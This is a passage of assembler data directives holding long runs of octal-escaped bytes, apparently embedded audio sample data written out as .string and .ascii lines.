\031\034\"\034\b\371\366\366\356\332\317\323\334\337\333\332\346\366\374\372\365\375\n\013\374\362\373\002\376\366\362\377\021\023\023\026#360,04-\023\n\t\013\004\355\347\360\371\372\364\370\004\017\023\002\001\t\b\003\356\343\350\351\340\322\320\334\346\346\337\344\363" .string "\377\366\366" .string "\006\373\351\343\347\351\340\322\321\336\347\345\341\344\366\377\372\362\357\366\370\351\327\317\323\324\311\275\273\310\321\320\315\327\352\371\366\362\371\006\013\002\366\361\374\375\366\351\360" .string "\b\b\b\020#.*#\"-. \020\017\022\020\002\372\374\t\020\t\t\020\036&\"\035!(&\027\b\007\013\n\373\363\371\006\017\t\n\030(.)$'0+\032\013\n\f\006\367\355\363\375\376\365\364\376\n\n" .string "\370\374\377\367\345\331\333\336\330\317\315\331\350\355\355\365\006\032\037\034\036(2-\036\032\034\036\032\n\b\f\024\026\017\016\032&$\033\027\037\035\030\006\374\375\374\364\347\345\353\361\357\355\360\374\007\007" .string "\002\005\005\377\361\353\355\355\343\333\334\344\353\354\353\357\375\004\006" .string "\377\b\007\376\360\350\352\346\334\322\320\330\334\330\327\334\347\355\351\346\346\353\353\341\331\327\333\333\326\322\326\341\351\354\356\371\007\020\021\020\025\034\035\026\016\f\016\r\005\376\001\t\f\f\f\023\036\"\037\031\035 \035\021\007\005\006\003\370\365\367\376\001" .string "\377\t\022\025\025\023\026\033\030\017\t\007\b\005\376\371\376\002\b\004\007\016\024\026\021\017\016\017\b\001\364\360\353\347\334\324\325\327\326\324\326\335\346\350\353\354\364\371\371\366\365\371\375\375\373\375\005\016\022\026\033$+-++,+&\034\025\023\020\n\003" .string "\002\005\005\003\005\013\020\020\r\f\r\r\007\377\372\371\367\361\355\354\360\363\364\364\367\377\004\004\004\004\007\b\003\376\373\373\371\365\357\357\363\365\364\364\367\372\376\375\373\372\373\367\363\351\345\343\337\331\323\326\330\334\335\340\345\356\365\366\370\375\001\004\002\377\001\003\004\001" .string "\004\b\016\017\021\031\035!\"####\036\030\024\024\017\n\007\007\013\013\013\013\020\024\025\023\023\023\024\021\013\b\005\004\001\376\373\375" .string "\001\002\004\t\016\021\022\021\022\024\020\013\006\003\001\374\367\363\363\364\363\360\360\361\362\360\355\351\347\344\337\330\324\322\321\320\316\317\324\332\340\345\354\364\375\003\007\f\021\025\026\024\022\024\023\021\r\f\016\016\016\r\020\021\023\024\020\021\020\017\t\003" .string "\375\371\366\361\361\361\361\361\361\363\366\373\372\372\372\373\374\372\367\362\363\357\355\353\353\355\362\363\365\371\375\001" .string "\002\001\001" .string "\375\371\364\361\357\352\346\345\346\345\344\345\345\350\350\351\347\350\351\347\346\345\344\345\345\345\346\351\360\364\371\377\005\013\021\024\030\033\035\037\035\034\034\033\032\030\026\026\030\031\031\032\034\036 \037\037 \037\034\031\026\023\021\016\013\t\t\n\013\f\r\020\023\024\025\025\026\026\025\022\017\016\r\f\n\t\n\013\f\f\f\017\020\020\016\r\f\n\006" .string "\373\366\362\353\347\342\337\336\335\334\335\337\341\344\345\351\353\356\361\362\365\367\373\376\377\002\007\r\020\022\027\034\037!\"!!!\035\033\027\023\021\r\n\007\006\006\005\004\006\006\007\007\004\004\003\001\377\373\371\365\364\361\357\357\357\360\361\362\364\367\370\372\373\374\374\373\372\370\367\366\365\364\362\362\362\363\363\363\363\365\364\363\362\360\357\354\351\344\342\337\333\331\326\325\325\327\330\332\335\342\345\351\354\361\364\367\371\373\374\376\001\002\003\006\t\r\017\022\025\030\033\034\034\033\033\031\030\025\022\021\016\r\013\n\n\013\n\013\013\r\r\f\f\f\f\n\b\006\005\004\003\001\001\001\001\002\004\006\007\n\013\f\f\r\f\013\n\007\006\004\001\376\374\371\370\366\364\362\360\360\356\353\350\346\343\340\335\332\330\327\326\327\331\333\341\344\351\357\366\374\001\006\n\016\022\023\025\026\027\026\026\026\027\026\026\027\026\026\025\026\025\025\023\022\016\t\004\002\376\375\373\373\372\373\374\375\375\376" .string "\001\003\002\004\001\005\377\001\370\002\367" .string "\365\370\375\364\022 !\r\t\354\003\374\017\017\362\360\362\004\361\327\347\364\334\007" .ascii "\350\370\341\001\021\376\002\361\022\007\364!\f\013\033\345\364" .ascii "\367\334\357\354\336\334\346\331\327\372\364\353\331\323\367" .ascii "\342\356\001\360\331\322\357\351\370%\t\020\007\350\364\345\346" .ascii "\362\360\372\374\024'\007'0\026+\037\022/\027\006\007\371\314" .ascii "\302\311\270\331\362\375\021\005\003\b\344\374\035$(-\032\020" .ascii " #\033\035\032\033\030\002\034\b\021\023\t\023\004\023\033\025" .ascii "\013\016\363\002\377\366\003\007\017\b$\023\022\017\004\021\020" .ascii "\024,- ,\037%BXPPK/4&\f\t\360\351\345\343\357\343\362\346\330" .ascii "\355\357\347\330\306\301\324\335\340\354\357\356\374\007\005" .ascii "\t\022\026\r\377\r\r\r\032,8DP8'\037\017\f\013\001\004\374\365" .ascii "\355\343" .string "\345\344\336\346\344\347\351\326\336\327\317\327\355\361\370\004\006\004\371\365\356\361\364\366\363\370\371\360\344\337\333\324\336\351\354\372\356\340\327\312\317\322\340\357\365\351\342\317\313\310\303\323\334\352\370\004\f\037*-.1(*,\037\016\370\352\327\316\316\326\343\361\370\372\362\357\347\337\354\367\n\013\n\006\372\377\371\374\006\f\024\032\026\033\034\026\037\036\035\"./.&\024\017\t\b\r\017\022\024\022\f\b\007\376\375\003\001\b\016\b\013\t\b\026%7BEF;3(\030\024\013\005\006\004\002\005\376\372\371\367\361\347\324\306\304\304\315\323\323\331\337\340\350\357\357\357\363\355\356\365\371\t\031+AKH@4.(\"!\034\030\022\006\001\370\357\353\354\352\350\353\344\335\326\316\320\321\326\340\341\337\342\341\335\335\341\341\351\360\363\374\372\366\366\361\360\367\372\001\006\004\377\361\353\344\342\351\352\357\360\352\337\322\311\277\276\304\310\323\334\347\362\373\007\r\016\022\025\027\027\024\f" .string "\367\353\352\361\365\003\013\017\020\n\006\001\001\b\f\023\026\021\016\t" .string "\376\375\375\002\006\n\f\f\013\r\016\017\026\034$-.+)'%%)+./*'!\031\027\024\023\024\026\026\022\021\f\013\022\032$+*'\"\032\r\006" .string "\374\376\001\005\t\013\r\r\t\006" .string "\364\347\337\333\335\340\342\344\350\354\361\367\370\374\373\367\365\364\363\367" .string "\r\034(0.(!\031\026\026\027\030\030\025\020\013\004\001" .string "" .ascii "\002\003\001\376\367\356\350\343\342\345\346\346\345\342\335" .ascii "\331\324\322\323\324\331\334\336\337\334\332\330" .string "\332\340\350\363\372\375\373\370\364\361\365\371\376\002\002\376\365\352\337\326\321\322\327\335\344\353\360\364\366\366\366\366\366\366\365\360\352\342\333\327\330\341\354\372\006\r\022\022\021\022\026\034#)*(%\036\027\022\016\017\020\022\024\023\017\013\006\001\001\003\006\013\017\017\017\f\013\f\017\025\033#')(&\"!\"$)+,*&\"!#',/-(\037\024\007\374\364\357\355\357\362\363\363\362\357\354\347\342\333\326\324\326\333\340\344\351\360\367" .string "\b\016\021\021\016\n\007\007\t\020\031\"))$\033\021\b\002\377\377\376\373\367\361\353\350\346\347\354\362\367\373\373\371\365\362\361\362\365\370\371\371\365\357\352\344\341\341\341\343\343\341\335\330\323\316\316\320\323\330\335\335\334\331\327\331\334\343\353\361\365\366\362\355\350\344\343\345\353\361\370\374\377" .string "\377\375\372\371\370\365\361\352\343\332\322\316\316\323\332\343\353\361\365\367\371\374\002\n\022\031\037!\" \037\036 #$')(% \033\026\023\023\023\024\023\021\016\013\007\007\006\b\013\r\016\017\016\r\f\r\020\024\031\036\"%&(+059::5-$\033\022\n\004\001\377\374\373\367\362\354\345\336\325\314\305\301\300\302\307\314\323\333\345\356\370" .string "\007\f\017\021\024\030\035$,2684.&\036\030\022\016\t\003\375\366\357\352\346\345\344\345\345\346\346\345\344\343\344\345\351\353\356\360\361\361\361\361\362\363\364\365\366\365\362\357\354\351\347\346\346\346\345\342\340\335\334\332\334\335\340\342\343\340\337\334\331\330\331\335\341\347\356\364\372\375" .string "\001\002\002\001\377\374\367\363\356\352\350\350\352\356\362\367\373\374\376\377" .ascii "\003\006\t\r\017\021\022\022\023\024\027\032\035 $%&&%$$%$%$" .ascii "#\" \035\034\032\031\031\030\027\025\023\020\017\016\r\016\017" .ascii "\022\023\025\030\032\036#&*,-+'$\037\032\026\023\021\017\016" .ascii "\013\b\003\376\367\356\345\334\324\316\314\314\316\321\325\333" .ascii "\341\350\355\364\370\375\001\004\t\016\024\033#*/220-*%!\034" .ascii "\031\024\016\t\003\376\372\367\365\363\362\357\356\353" .string "\350\347\344\343\343\342\343\344\343\344\345\346\347\352\354\357\360\361\362\362\362\362\361\362\362\362\361\360\356\355\354\354\353\354\354\353\352\347\344\341\335\334\332\333\334\336\342\345\350\353\355\357\360\361\362\361\361\357\356\356\356\357\362\365\372\377\002\006\b\013\f\016\017\020\022\023\024\024\024\023\023\022\023\024\025\026\027\030\030\027\026\027\030\030\032\033\034\035\036\036\037\037\037\037\037\037\036\034\033\032\030\026\026\025\025\026\025\026\027\031\032\034\035\036\035\034\031\026\022\017\013\b\007\005\004\004\003\001\376\372\365\357\350\342\334\330\325\325\327\331\335\341\346\353\360\364\370\374\376\002\005\b\r\021\026\033\036\037 \037\035\033\030\026\023\020\016\n\007\004\002\377\376\373\372\371\370\365\363\361\356\355\352\351\347\346\345\344\343\342\343\343\343\344\344\345\345\345\346\345\346\347\346\350\351\351\352\352\353\354\355\357\360\360\360\357\355\352\350\345\344\342\341\340\341\342\343\344\345\345\344\345\344\343\342\341\340\337\340\341\344\347\354\361\366\373" .string "\005\b\013\016\021\024\026\027\030\031\031\032\031\031\031\030\031\030\030\027\026\025\024\023\022\021\021\020\021\022\021\022\023\023\024\024\025\025\026\027\026\027\027\027\027\030\030\031\032\032\033\034\035\036\037\036\035\032\027\023\020\r\b\005\002\377\376\373\371\366\363\357\352\345\340\333\327\324\323\324\326\332\336\343\351\356\363\367\374" .string "\003\007\n\016\021\026\031\034\037 \037\036\034\031\026\023\017\f\t\006\003" .string "\375\374\372\371\371\370\370\367\366\365\364\363\362\360\357\356\356\355\355\354\354\354\354\354\353\354\353\352\351\351\350\350\347\346\346\346\346\347\350\350\353\354\355\356\356\357\356\355\354\353\352\351\350\351\350\352\351\352\352\353\352\351\350\346\345\344\344\343\347\351\356\362\370\373" .string "\003\b\t\013\n\013\013\f\r\r\016\r\017\f\020\006\b\366\376\033\022\313\307\006\005\004\361\327/!\0205\n)/D3-\031\035\026$\375\327\353\300\001\337\335\016" .string "\275\322\357\004G3:4\026\f\345\260\325\331\335\004\345\360\357\347\337\323\363\365\013\364\367\364\335\333\272\275\324\316\244\246\265\321\331\363\357\335\375\337\321\307\300\320\316\325\311\277\337\334\331\f\b\037\"\022\031\"/(.\013\004\377\364\353\370\003\035&\025\032\003\032:8;NKILI>KF \030%\035\021\031\020\032\" $605\033\n\025\022\007\357\357\350" .string "\372\351\345\353\370\360\350\352\377\b\377\371\361\r/\036\017\003\357\350\355\320\317\321\323\323\307\331\342\362" .string "\363\367\021\b\365\321\270\317\351\346\351\371\b\022\017\017\034177.0>E:)=JXV16<=?*,:94!\033\"\031\020\367\347\357\361\341\324\315\330\347\346\340\350\375\367\361\350\337\335\331\317\271\267\276\273\260\245\254\270\274\305\301\324\356\341\333\316\311\335\341\326\313\310\320\301\257\254\253\307\324\322\335\364\r\035-3=H<(\037\034\036\013\361\346\353\364\001\007\020(@?71,><./,,*\023\031!,0!)0:?4.65*\034\023\020\020\007\361\356\365\003\t" .string "\002\022\031\025\016\002\007\n\372\343\343\341\345\341\317\331\363\r\025\022\021\030\030\021\377\370\373\364\347\321\311\322\331\321\312\322\337\347\331\305\306\324\354\366\362\370\f\023\006\374\371\375\b\002\371\004\026&.2Hbg_PLQK:&\033\037\033\013\004\003\r\026\021\t\017\033\035\024\t\007\016\n\375\356\346\355\351\333\322\332\345\345\344\335\344\365\363\355\345\344\355\351\334\320\317\321\312\270\263\271\311\322\314\315\330\335\327\316\301\303\314\310\274\267\277\316\330\330\341\354\372\375\366\362\373\006\375\357\346\346\361\357\345\347\354\367\367\356\357\374\020\031\027\037-:>318<3#\035\037%#\032\034)3607EMKBAGK@-%((!\022\023\036&&\036\"/74)-;@7$\032\030\022\001\357\352\356\361\353\341\345\362\374\371\357\355\362\347\313\262\245\251\260\255\251\265\306\323\326\323\335\357\371\367\360\363\375" .string "\373\365\374\f\020\005\371\367" .string "\004\375\367\376\f\020\t" .ascii "\002\b\005\367\351\345\354\353\341\331\341\357\367\370\365\001" .ascii "\021\025\020\013\r\025\021\001\366\366\376\374\361\354\363\003" .ascii "\b\006\t\024!!\030\021\027 \033\n\375\373\374\360\337\326\333" .ascii "\346\355\353\357\002\030\037\034\034 #\027\002\362\355\352\336" .ascii "\315\304\313\327\334\333\343\364\005\007\376\373\004\013\005" .ascii "\366\356\360\363\353\336\334\346\362\363\356\364\003\017\r\005" .ascii "\002\b\013\001\362\353\360\364\355\343\346\363\376\377\373\001" .ascii "\021\035\034\024\025\035 \027\b\003\t\r\005\377\t\035-0-3>C9" .ascii "*%)%\026\006\002\006\b\377\365\367\377\376\361\345\350\372\006" .ascii "\b\b\020\036\"\032\016\017\027\027\016\b\017 ,.2ATZREAA8$\021" .ascii "\t\t\003\364\350\353\365\367\361\356\366\004\006\376\365\367" .ascii "\374\365\344\327\324\327\322\305\276\304\321\326\320\320\333" .ascii "\350\352\342\333\336\343\335\316\303\303\306\300\264\261\273" .ascii "\311\317\314\315\327\341\337\324\317\322\327\322\306\304\311" .ascii "\324\325\321\322\335\350\352\345\344\357\366\363\351\345\352" .ascii "\360\354\345\344\354\364\363\355\361\376\f\021\022\030&12..4" .ascii "70$ #% \027\030!*+)/;CB==AA8,')(\"\033\034%,-,2=CDAFMOG:2.'\033" .ascii "\016\t\016\016\n\007\n\022\025\020\007\002\375\360\334\313\303" .ascii "\304\305\303\303\314\331\343\347\352\365\001\007\007\005\t\017" .ascii "\020\r\t\013\017\f\004\374\373\374\374\366\362\364\371\370\361" .ascii "\353\351\351\343\331\320\316\316\313\305\302\306\314\316\315" .ascii "\317\326\336\341\337" .string "\336\340\344\341\332\324\323\324\321\314\313\320\327\333\333\336\345\355\356\354\355\360\364\362\353\346\345\344\337\331\326\332\340\344\347\356\373\006\r\016\020\024\025\020\007" .string "\374\371\363\355\354\362\372" .string "\005\016\031#'(*.0-(%&&# !&+-.28==99861)%#\"\036\032\032\036!! \"'))&%%#\035\027\024\024\023\022\021\025\033\037 \036\037!\037\031\022\r\n\005\374\362\356\353\346\337\327\323\317\312\303\276\276\303\307\313\316\324\332\336\335\335\337\342\344\345\346\354\364\373" .string "\007\020\030\033\031\026\023\017\t" .string "\370\362\357\351\343\337\337\340\341\341\342\346\352\353\353\352\351\351\346\340\335\334\332\332\330\330\334\341\344\345\350\355\363\365\365\365\366\366\364\360\354\353\352\350\347\347\354\361\364\366\371\374\377\376\374\372\372\371\367\364\364\365\370\371\372\373\377\001\002\002\003\005\006\006\005\005\007\n\013\013\f\017\022\022\023\026\032\037\"$(-021221/+('%# \037 !!!#'))(''%!\034\030\026\023\020\r\r\017\021\022\023\026\032\036\037 \"#\"\036\030\023\017\t\002\375\372\371\367\365\364\363\364\362\357\352\344\335\324\312\302\276\274\274\274\300\305\315\324\331\340\347\356\363\367\372\377\003\006\007\b\013\f\013\t\006\004\003\002\377\375\374\374\373\370\365\362\361\355\351\346\343\340\337\334\333\334\334\336\336\337\342\345\347\347\350\351\351\350\347\345\344\343\342\342\342\343\346\347\350\352\355\360\362\363\365\366\367\366\365\362\361\357\354\351\350\350\352\353\356\361\366\372\375\376" .string "\001" .string "\375\372\367\365\364\362\362\363\367\374\001\006\r\023\031\035 #&''&&%&%%&)*,-012321/.+'&$#\"!!!\"\"##$&%$%$#!\037\036\036\035\036\036\037\"#\"\"! \035\032\027\022\017\013\006\001\374\370\363\356\347\343\335\330\324\320\317\320\322\325\330\334\337\343\345\350\353\356\361\364\367\373" .string "\005\n\017\023\026\030\027\026\023\020\013\005" .ascii "\373\370\363\357\354\352\351\350\347\346\347\347\347\346\344" .ascii "\343\341\337\334\332\331\327\326\325\325\326\327\331\332\333" .ascii "\336\337\340\341\341\341\340\337\335\333\332\333\332\332\333" .ascii "\335\337\341\342\343\345\345\345\344\343\342\341\337\336\335" .ascii "\336\335\336\337\337\340\341\343\343\344\346\346\350\352\354" .ascii "\357\362\364\367\373\376\001\004\b\n\016\021\025\027\033\036" .ascii "!\"%%'''%%# \027'\035\0211\032\026\005)35B,C(3-\035,\037#%91" .ascii "\031&(\03615\021&\030\0374\023\t&\035\004\022" .string "\t\007\374\013\001\034$\376\026\006\020\001\367\n\360\376\370\360\371\367\001\b\371\370\n\377\377\026\n\373\017\016\013*\030\025&\022\035\021\377\034\026\r!\025\024\024\033\020\004\023\022\026&$\023\007\377\003\363\365\364\356\362\361\366\353\350\351\344\336\345\351\326\342\337\313\345\323\315\346\332\331\346\333\355\365\346\360\361\365\375\006\t\004\366\357\342\336\347\352\334\341\347\333\333\332\330\321\314\324\314\312\317\301\311\303\274\275\305\340\324\335\371\336\353\372\365\006\004\r\026\031\"\030\025\016\004\020\020\016$#\033\024\t\r\372\376\374\371\376\376\006\373\365\360\355\357\372\004\006\n\f\t\016\t\b\025\027\034(# %\036\030\025\026\031 &\036\034\022\003\376\367\002\373\376\004\371\370\357\347\336\327\325\321\327\343\336\330\325\325\324\335\354\357\367\b\005\b\017\003\013\f\020 !(,%\"\036\034\031\035%\037\036\031\021\n\375\377\375\374\003\016\022\r\017\n\005\005\b\f\024\026\030\023\023\f" .string "\006\001\375\013\b\t\017\377\377\365\356\365\363\367\372\366\363\352\343\343\343\344\354\372\370" .string "\003\374\372\367\372\372\375\n\016\r\f\006\003\374\371\373\375\002\373\373\372\354\355\350\336\346\350\352\366\365\364\367\362\362\366\376\004\017\030\033\033\034\036 (15;=90.)%%&*'&\"\031\025\016\b\013\013\f\021\n\007\001\370\370\366\372" .string "\006\n\r\016\r\r\020\025\034 &,(% \027\021\016\020\021\021\017\t\002\366\356\345\337\334\325\324\324\311\304\275\266\270\271\277\311\322\331\343\344\347\353\362\370\002\016\025\036\037!\037\032\032\033\033\036\037\035\026\017\006\373\370\362\363\362\360\360\351\345\336\327\325\325\325\337\341\343\347\341\341\341\342\346\355\361\367\372\372\366\364\361\355\356\357\362\362\361\357\350\342\336\332\332\334\337\340\340\334\326\322\316\315\316\320\327\333\335\340\333\334\331\332\340\345\354\360\362\360\355\351\346\345\351\354\361\366\372\372\367\365\363\364\370\375\001\004\005\003\377\375\373\374\001\006\016\024\027\031\026\026\026\026\034!&,+*& \035\034\034\036!!\036\032\025\r\b\005\006\007\n\f\n\007\004" .string "\376\001\006\013\022\027\030\030\026\024\024\024\030\034!#\037\034\025\f\007\002\377\377\374\371\363\353\343\334\330\327\331\336\343\347\351\351\350\347\353\362\371\004\016\026\034 !\"%)/5:<:60)%\"\"$\"\037\033\022\n\003\375\372\372\372\372\372\366\361\353\347\345\347\354\363\370\374\376\375\374\373\375\001\006\r\022\024\023\017\f\b\007\007\t\r\016\r\b\001\372\364\356\355\355\354\355\352\345\337\331\325\323\325\331\336\344\346\347\346\345\346\352\360\372\002\n\020\022\021\022\021\022\027\034!$$\"\034\027\023\021\023\024\026\030\025\022\r\007\004\004\006\013\020\024\026\025\023\021\021\023\030\035\"&%#\037\032\027\026\027\031\034\034\032\026\017\n\005\003\005\006\007\007\005" .string "\372\364\361\360\362\366\371\374\373\370\363\360\355\355\356\361\362\361\357\352\344\337\335\335\340\344\351\353\353\352\350\347\347\352\360\365\373\377" .string "\377\376\375\375" .string "\004\t\r\017\017\016\013\t\b\t\f\020\021\022\020\013\006\001\376\374\375\375\374\372\366\360\352\345\341\340\340\341\342\341\337\333\330\325\325\327\333\340\343\346\350\347\350\350\352\356\363\370\373\375\374\371\366\363\360\357\357\357\355\352\345\337\332\325\321\320\317\320\317\316\314\311\310\307\311\315\324\333\342\347\354\360\363\370\375\004\013\021\027\031\033\033\032\032\032\034\035\036\036\035\032\025\020\r\013\n\t\t\b\005\002\377\374\373\373\374\377\002\004\005\006\005\006\007\t\f\021\024\027\030\027\026\025\024\024\025\026\027\026\023\020\f\007\004\001\377\376\375\372\367\362\355\350\345\342\341\340\337\336\335\333\332\331\332\335\341\346\354\360\364\367\372\375" .string "\005\n\017\024\027\031\031\032\031\031\030\031\031\030\030\025\022\016\f\t\b\b\t\n\n\t\b\006\006\005\006\007\b\t\n\t\007\006\003\002\003\002\003\002\001" .string "\375\372\370\367\366\365\366\366\366\365\363\362\361\362\363\366\367\372\373\374\373\374\374\373\374\375\376\376\375\374\371\366\364\363\361\361\360\357\356\353\352\350\347\350\351\354\357\362\364\367\370\373\376\001\006\013\020\023\030\033\034\037!$'),-.-,*)('&$#!\036\033\030\027\024\023\022\021\020\017\r\f\013\013\n\013\r\016\021\022\023\024\025\026\031\032\034\035\036\036\035\034\032\030\027\026\023\022\017\f\007\003\376\372\365\360\354\351\344\341\336\332\331\330\331\332\336\341\345\352\355\362\367\374\003\b\017\024\031\035 #$%&'&&$# \035\031\026\024\021\017\f\n\007\004\001" .string "\375\374\373\373\374\373\372\372\373\372\373\374\375\376\377\377" .string "\377\376\376\375\376\375\376\375\375\374\373\371\370\367\367\366\365\365\364\363\360\357\356\354\353\353\352\351\350\347\346\345\345\344\343\343\344\345\344\345\345\344\345\347\350\353\356\360\363\365\370\372\375\377\002\005\007\t\013\f\r\016\017\020\021\022\024\024\025\026\026\025\026\025\026\025\025\026\025\024\023\021\020\017\016\r\r\f\n\t\007\006\004\004\003\003\002\001\001" .string "\001" .string "\001" .ascii "\001" .string "\002\003\004\003\004\003\004\003\004\003\002\002" .string "\377\374\371\366\363\357\354\347\344\340\335\331\326\325\323\323\322\324\325\327\332\334\340\343\350\355\362\367\374\001\006\n\r\020\023\024\027\030\030\031\030\027\026\024\023\020\017\f\013\b\005\003" .string "\375\372\371\366\365\362\361\360\356\355\354\353\354\353\354\354\355\355\356\357\357\360\361\362\363\364\365\366\365\366\367\366\367\366\365\365\364\363\361\360\357\354\353\350\347\344\342\337\336\333\331\330\327\326\325\326\325\326\327\330\332\335\340\344\347\352\357\363\366\371\375" .string "\004\007\n\r\016\017\021\022\023\022\023\022\023\023\022\021\020\017\016\r\r\f\013\f\013\013\n\t\n\t\n\t\n\t\t\n\t\b\t\b\t\b\007\007\b\007\006\007\006\005\005\006\005\004\004\003\002\001" .string "\377\377\376\375\373\372\371\367\364\361\357\354\352\347\345\342\340\336\335\334\334\334\335\340\341\344\347\352\356\361\365\372\375\002\005\t\f\017\021\023\024\027\027\030\030\031\030\027\026\026\025\022\016\013\t\006\006\005\005\004\006\004\007\004\006\003\005\002\004\001\002" .string "\001\375\373\356\335\367\017\002\265\367)\r\341\366TA\334\356\007\351\025\0265\026\373\031$\032+\004\367\373\0071\332\365\024\321\244\274\300\3635\366" .string "\017\017\375\312\341\003\377\034#\371\b\360\346\312\271\302\310\356\321\335\313\306\342\305\336\376\370\320\273\305\301\332\347\266\273\313\251\271\232\251\315\272\342\320\326\370\006&1\035.(\024\035\364\002\027\006\356\350\373\006\021\024,EMJ+\0251?.))!+3#4E13. IJC8\0362!\024\033\b\031\020\350\362\375\013\024\022\004\013(%\025\001\364\363\341\323\315\316\341\332\332\323\003*\035\036\023\f\025\023\373\360\331\327\326\307\306\274\341\347\317\362\376\006\005\337\336" .string "\025\036\023\017\f\017\f\001\376\001\031\036\021\03415=KW`s\\GD2:,\020\016\020\027\020\376\006\r\021\033\f\t\025\016\005\361\341\351\351\340\322\313\320\326\322\311\313\315\327\333\320\316\341\345\330\314\307\311\315\315\272\302\310\306\303\267\300\324\352\364\356\355\361\350\332\314\313\331\330\322\321\330\354\005\021\024\035-82,+2'\027\004\372\003\b\003\377\f\027\032\033\021\0326<BBAKG9.*,'\027\n\007\021\030\r\013\026 ')\"!+%\027\n\006\016\b\366\354\354\363\366\357\344\357\377\001\001\373\373\n\t\370\373\004\022\022\377\362\354\361\354\336\334\342\351\360\343\337\356\373\372\363\356\360\357\332\277\265\276\321\336\335\351\376\020\030\025\025\037-*\036\035\037+-#->GB638CA3/7:3$\030\032\031\f\370\363\366\373\366\352\357\374\b\n\001\376\b\f" .string "\357\351\350\345\331\307\304\313\320\314\303\307\330\343\345\337\340\351\347\336\320\314\326\325\313\276\265\265\265\257\246\255\300\317\321\321\337\365\003\007\001\377\001\376\355\332\326\334\332\321\306\316\346\361\371\374\007\032\037\030\020\021\036!\027\016\016\033\036\030\027#2;:5<JKB76;5(\036!)+'!,>A;8<GD6-*-%\024\b\n\022\024\r\025':@6001$\017\375\365\362\346\322\310\314\326\327\317\315\324\323\310\270\264\301\322\324\316\315\324\334\327\310\305\315\327\333\324\333\355\001\r\020\035.6.\032\013\013\b\370\345\340\345\354\352\343\346\363\377" .ascii "\372\375\n\021\t\375\372\375\001\367\350\346\356\365\365\357" .ascii "\364\005\021\022\r\022\035#\033\013\007\r\013\002\365\362\371" .ascii "\375\370\362\373\r\027\025\016\017\024\021\004\363\355\361\362" .ascii "\347\335\343\364\377\377\374\003\023\026\016\004\002\007\001" .ascii "\357\336\331\336\335\325\316\322\337\344\336\334\351\373\004" .ascii "\003\377\006\021\021\004\370\367\373\366\350\336\341\353\355" .ascii "\347\345\360\001\b\006\004\f\032\030\f\002\002\007\002\362\353" .ascii "\360\372\374\366\370\005\026\034\030\032$12+*2;6%\032\032\036" .ascii "\031\f\b\023\037!\033\033%/)\032\016\007\377\353\324\314\327" .ascii "\346\354\354\365\n\035#!%1;8-(061((280$!)0+!\035#%\031\006\375" .ascii "\375\370\353\332\325\333\340\333\323\326\344\356\353\343\346" .ascii "\361\365\353\335\331\334\332\315\276\273\302\306\301\272\301" .ascii "\321\334\333\326\332\343\345\333\317\316\324\323\306\271\270" .ascii "\274\274\266\261\270\310\322\325\327\343\365\375\370\361\361" .ascii "\365\357\341\322\317\324\323\315\312" .string "\326\350\364\371\375\t\030\033\025\020\022\031\030\016\007\013\023\026\023\024\036,323:CC:3340$\035 &'$$.:=::@FD:222-!\034\037&((-:EGC?@?6'\034\027\023\t\374\363\364\366\361\351\344\345\343\334\323\322\331\341\342\337\337\345\351\345\337\336\345\353\354\354\362\377\013\022\025\033#&\037\023\n\005\376\361\345\336\334\334\327\322\323\332\337\337\335\337\345\347\342\332\326\326\323\313\304\302\306\312\311\311\316\327\337\341\341\344\352\354\351\344\341\344\342\334\324\323\327\331\331\333\342\355\364\366\366\370\374\373\364\355\353\354\353\347\346\353\363\371\373\375\004\013\016\r\013\013\r\f\006\002\003\006\b\005\005\t\020\024\025\031!*0238<<7311.'##&&##'-...243/*'% \030\023\021\023\022\020\021\026\033\035\036\036#&&$#$\"\035\024\r\t\005" .ascii "\373\367\370\372\371\366\366\367\366\360\346\335\324\311\276" .ascii "\264\257\261\266\272\276\306\321\334\343\350\355\364\371\373" .ascii "\372\374\377\002\003\002\004\007\b\007\004\003\004\004\002\377" .ascii "\375\374\373\366\360\354\352\346" .string "\341\334\333\333\333\333\332\336\342\346\347\351\352\356\360\355\353\352\352\351\345\343\342\344\346\347\347\352\357\364\364\365\370\373\375\373\372\373\373\372\366\363\361\360\357\356\354\357\364\371\374\377\004\013\r\f\013\t\b\003\376\371\367\366\366\366\370\375\004\n\021\026\034\"$%$%%$! !!\"#&*..0121-)'$\037\033\030\027\027\030\027\027\032\035\036\036\035\035\036\034\031\026\025\023\020\r\013\013\016\017\021\024\031\034\034\032\031\026\023\016\007\002\375\370\361\354\347\344\341\335\330\323\316\313\306\303\303\305\310\313\316\321\326\331\333\335\340\344\350\355\361\367\376\005\013\020\025\030\031\026\022\r\b\004\375\367\362\360\355\352\350\350\351\352\352\353\354\355\355\352\351\346\345\343\337\335\334\334\335\336\340\342\345\351\354\355\357\361\362\361\357\356\355\354\351\347\346\347\351\352\354\360\364\367\371\372\373\373\372\367\364\363\361\360\357\356\360\363\364\366\367\372\374\375\375\376\376\377\377\376\377" .string "\003\006\007\n\r\021\024\030\033 #'),/010//.-*)(''&&'))*++,+*(%$ \035\033\032\032\031\030\031\033\034\037\037!$%&%&%# \033\027\023\020\f\t\007\006\004\003" .string "\376\373\370\363\354\344\335\325\316\310\306\305\307\312\316\323\332\340\346\353\361\366\372\375" .ascii "\003\006\t\n\013\r\r\016\r\013\n\b\007\004\002\377\375\372\366" .ascii "\362\357\354\350\345\342\340\337\335\335\334\333\334\334\335" .ascii "\336\336\337\337\337\336\335\334\334\333\332\331\332\331\332" .ascii "\333\334\335\337\340\341\342\343\344\344\345\345\345\345\343" .ascii "\342\340\337\336\335\335\335\337\340\342\343\346\347\351\351" .ascii "\351\351\347\346\343\343\341\343\343\346\351\357\363\374\002" .ascii "\013\017\026\031\035\036 \037\036\036\034\037\033 \032#\033" .ascii "%\024\031\002\035\020\360\026\371\354\001;\n\3562*6T #H\341" .ascii "\371\037\337\375\234\350\t\3738\324\336\373%5\357\363\307\340" .ascii "\030+\372\370\347\351\366\311\303\370\350\252\333\030\353\361" .ascii "-*9\020$8SE:\027\034\030\344\013!\016\340\354\270\274\272\260" .ascii "\322\236\304\303\245\351\371\370#2\033\037)" .string "$2\t\355\006\026\354\333\361\320\344\340\375(\036\022\367\t2,\017;E\013\0260,\037\037\363\355\372\350\341\306\323\260\264\272\351\341\331\346\322\357\352\013\027 \030+1oL;LB\\;B*8\036\023\023\034\033\030*\033\005\362\001\376\374\377\342\320" .string "\333\320\345\362\367\340\016\b\n\364\314\306\342\345\335\363\016\340\333\"\004\b\n\033\026\" %>L, RYM\034-\017\361\005\355\324\355\300\263\277\311\341\303\336\354\324\320\355\365\362\351\337\366\025" .string 